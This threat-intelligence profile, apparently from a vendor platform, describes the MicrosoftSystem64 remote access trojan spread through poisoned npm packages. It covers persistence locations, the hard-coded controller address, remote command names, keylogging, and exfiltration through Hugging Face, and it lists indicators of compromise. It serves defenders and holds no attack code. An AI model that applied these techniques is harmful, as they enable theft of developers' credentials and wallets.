MicrosoftSystem64
MicrosoftSystem64 is a cross-platform remote access trojan (RAT) delivered through malicious npm packages in a software supply-chain campaign. Reporting describes it as an 81 MB Node.js Single Executable Application (SEA) binary deployed via poisoned packages including js-logger-pack and additional publisher/package clusters such as terminal-logger-utils, ts-logger-pack, pretty-logger-utils, and pinno-loggers. The package abuse included a postinstall-based downloader that fetched platform-specific MicrosoftSystem64 binaries from the Hugging Face repository Lordplay/system-releases.
The malware targets Windows, macOS, and Linux. It establishes persistence across all three platforms: on Windows via scheduled tasks and Run/registry keys, on macOS via LaunchAgents, and on Linux via systemd user services or XDG autostart entries. It sets its process title to MicrosoftSystem64 to resemble a legitimate Microsoft background service, connects to a hard-coded controller at 195.201.194.107:8010 over WebSocket and HTTP, and supports a typed task protocol with 24 remote commands. Reported capabilities include arbitrary file read/write and directory operations, recursive file scanning, deployment of additional binaries, self-update, browser session clearing, and reconnection/retry logic after interruptions.
Its collection and theft behavior is extensive. High-confidence reporting states that it steals browser credentials and targets credentials from 15 browser families, steals data from more than 80 cryptocurrency wallet extensions, hijacks Telegram Desktop sessions/tdata, copies SSH keys, logs keystrokes, monitors the clipboard, captures screenshots every 60 seconds, and scans files for secrets. It can also force browser reauthentication by clearing sessions while keylogging remains active.
A notable feature is its abuse of Hugging Face for both payload delivery and exfiltration. The malware checks Hugging Face for updates, downloads binaries without signature or checksum validation, and uploads stolen data to private Hugging Face datasets controlled by the attacker. Reporting states each victim may receive separate private datasets organized by machine identity and data category, and that outbound traffic blends in as legitimate authenticated HTTPS API activity. The active exfiltration account was reported as jpeek998, created on 2026-05-15. The malware also maintained local upload state and resumed failed uploads automatically.
The campaign was documented by SafeDep and independently confirmed by JFrog. SafeDep reported live victim monitoring and recovered hundreds of screenshots from real victims as of 2026-05-28. OSV tracked the malicious npm package family as MAL-2026-2827. Attribution in the provided reporting links the operation to the North Korea-connected Contagious Interview threat group; separate social reporting also associated it with Famous Chollima/DPRK themes. The campaign specifically targeted developers through malicious open-source packages in the npm ecosystem.
Known indicators directly mentioned in the content include controller 195.201.194.107:8010, Hugging Face repository Lordplay/system-releases, exfiltration account jpeek998, and platform-specific payload names MicrosoftSystem64-win.exe, MicrosoftSystem64-darwin-x64, MicrosoftSystem64-darwin-arm64, and MicrosoftSystem64-linux. Reported hashes include SEA blob SHA-256 46b9522ba2dc757ac00a513dbd98b28babb018eae92347f2cbc3c7a5020872b5 and embedded JavaScript payload SHA-256 1c83019b52be6da9583d28fe934441a74eacef0cd7dbb9d71017122de6fe7cfc.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace" published by SafeDep.
A newly discovered malware called MicrosoftSystem64 has been quietly stealing data from infected computers by routing stolen files through HuggingFace... Once a developer installs the package, it silently downloads and executes MicrosoftSystem64... The malware is a remote access trojan with sweeping capabilities.
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueMalware ... Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace ... an 81 MB Node.js SEA binary deployed via malicious npm packages.
Execution
6 techniquesOnce installed, the malware digs in using the native persistence tools of each platform: scheduled tasks and registry keys on Windows, LaunchAgents on macOS, and systemd services with autostart entries on Linux.
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows)
Once a developer installs the package, it silently downloads and executes MicrosoftSystem64, an 81 MB binary that runs on Windows, Linux, and macOS without needing any separate software pre-installed.
Windows: compiles C# in-memory via PowerShell Add-Type to install a SetWindowsHookEx low-level keyboard hook
The malicious logic lives entirely inside the injected JavaScript bundle.
Windows: compiles C# in-memory via PowerShell Add-Type to install a SetWindowsHookEx low-level keyboard hook, with UIAAutomation-based password-field detection.
Persistence
7 techniquesOnce installed, the malware digs in using the native persistence tools of each platform: scheduled tasks and registry keys on Windows, LaunchAgents on macOS, and systemd services with autostart entries on Linux.
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows)
Once installed, the malware digs in using the native persistence tools of each platform... and systemd services with autostart entries on Linux.
Persistence — macOS ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist macOS LaunchAgent persistence path
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows), LaunchAgent (macOS), or systemd user unit / XDG autostart (Linux)
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows), LaunchAgent (macOS), or systemd user unit / XDG autostart (Linux)
Privilege Escalation
7 techniquesOnce installed, the malware digs in using the native persistence tools of each platform: scheduled tasks and registry keys on Windows, LaunchAgents on macOS, and systemd services with autostart entries on Linux.
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows)
Once installed, the malware digs in using the native persistence tools of each platform... and systemd services with autostart entries on Linux.
Persistence — macOS ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist macOS LaunchAgent persistence path
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows), LaunchAgent (macOS), or systemd user unit / XDG autostart (Linux)
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows), LaunchAgent (macOS), or systemd user unit / XDG autostart (Linux)
Stealth
2 techniquesThe malware disguises itself as a legitimate Microsoft process... It labels its own process as MicrosoftSystem64 in system listings, closely mimicking the appearance of a genuine Microsoft background service.
clear_sessions - kill browser processes and destroy session/credential stores
Credential Access
4 techniquesIt targets credentials from 15 browser families... runs a continuous keylogger, and takes screenshots every 60 seconds.
This RAT steals ... Telegram sessions
This RAT steals browser credentials, 80+ crypto wallet extensions, Telegram sessions...
This RAT steals browser credentials...
Discovery
3 techniquesBaseline automatic behavior includes: beaconing system info to the hard-coded controller
The capability list is explicit in the extracted bundle: ping , get_system_info , list_drives , list_dir
scan_files - recursive credential, wallet, browser, shell-history, and environment-variable scanning
Collection
6 techniquesThe operator can read or write any user-accessible file.
It targets credentials from 15 browser families... runs a continuous keylogger, and takes screenshots every 60 seconds.
It targets credentials from 15 browser families... runs a continuous keylogger, and takes screenshots every 60 seconds.
The malware persists on Windows, macOS, and Linux, beacons to a hard-coded controller, logs keystrokes, monitors the clipboard
It targets credentials from 15 browser families, lifts data from over 80 cryptocurrency wallet extensions, hijacks Telegram Desktop sessions, copies SSH keys, runs a continuous keylogger, and takes screenshots every 60 seconds.
It then: archives the requested file or folder into a gzip file under the system temp directory
Command and Control
3 techniquesThis means all outbound traffic looks like normal, authenticated HTTPS requests to a well-known AI platform... The malware reconnects to its command server over WebSocket after any interruption
Once a developer installs the package, it silently downloads and executes MicrosoftSystem64... The malware also pulls updates from HuggingFace every 24 hours, replacing its own binary when a newer version is available.
"Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace"
Exfiltration
2 techniquesA Supply Chain RAT Exfiltrating to HuggingFace
Malware Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace
Other
1 techniqueIOCs tracked for this family
19 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Cross-platform remote access trojan delivered via poisoned npm packages that steals browser credentials, cryptocurrency wallet data, Telegram Desktop sessions, SSH keys, keystrokes, and screenshots; persists across Windows, Linux, and macOS; uses HuggingFace for binary hosting, self-updates, and exfiltration; and supports remote command execution.
A remote access trojan referenced in the context of a supply chain campaign, described as exfiltrating data to HuggingFace.
A supply-chain remote access trojan delivered via malicious npm packages. It is described as a Node.js SEA binary that steals browser credentials, cryptocurrency wallet extension data, and Telegram sessions, and exfiltrates data to HuggingFace.
A remote access trojan delivered via malicious npm packages as an 81 MB Node.js SEA binary. It is described as stealing browser credentials, data from more than 80 crypto wallet extensions, and Telegram sessions, and exfiltrating data to HuggingFace.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.